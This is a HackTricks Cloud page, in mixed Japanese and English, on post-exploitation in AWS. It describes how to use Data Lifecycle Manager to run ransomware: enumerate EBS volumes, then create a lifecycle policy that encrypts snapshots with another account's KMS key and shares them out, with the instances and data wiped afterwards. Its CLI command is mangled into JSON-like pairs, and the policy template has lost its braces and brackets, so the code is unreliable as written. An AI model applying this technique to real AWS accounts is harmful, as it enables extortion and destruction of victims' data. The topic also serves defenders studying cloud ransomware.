AWS - DLM Post Exploitation

htARTE(HackTricks AWS Red Team Expert) でAWSハッキングをゼロからヒーローまで学びましょう




ランサムウェア攻撃は、可能な限り多くのEBSボリュームを暗号化し、現在のEC2インスタンス、EBSボリューム、およびスナップショットを消去することで実行できます。この悪意のある活動を自動化するために、Amazon DLMを使用して、別のAWSアカウントからKMSキーでスナップショットを暗号化し、暗号化されたスナップショットを別のアカウントに転送することができます。また、暗号化せずにスナップショットを管理するアカウントに転送し、そこで暗号化することもできます。既存のEBSボリュームやスナップショットを直接暗号化するのは簡単ではありませんが、新しいボリュームやスナップショットを作成することで可能です。

まず、インスタンスID、ボリュームID、暗号化ステータス、アタッチメントステータス、ボリュームタイプなどの情報を収集するコマンドを使用します。 aws ec2 describe-volumes

Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.

  "aws dlm create-lifecycle-policy --description": "最初のポリシー",
  "--state": "ENABLED",
  "--execution-role-arn": "arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole",
  "--policy-details": "file://policyDetails.json"

A template for the policy document can be seen here:
"ResourceTypes": [
"TargetTags": [
"Key": "ExampleKey",
"Value": "ExampleValue"
"Schedules": [
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
"Key": "SnapshotCreator",
"Value": "DLM"
"VariableTags": [
"Key": "CostCenter",
"Value": "Finance"
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"RetainRule": {
"Count": 14
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
"CrossRegionCopyRules": [
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
"ShareRules": [
"TargetAccounts": [
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
"Parameters": {
"ExcludeBootVolume": false


<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href=""><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](!
* Get the [**official PEASS & HackTricks swag**](
* Discover [**The PEASS Family**](, our collection of exclusive [**NFTs**](
* **Join the** 💬 [**Discord group**]( or the [**telegram group**]( or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**]( and [**HackTricks Cloud**]( github repos.

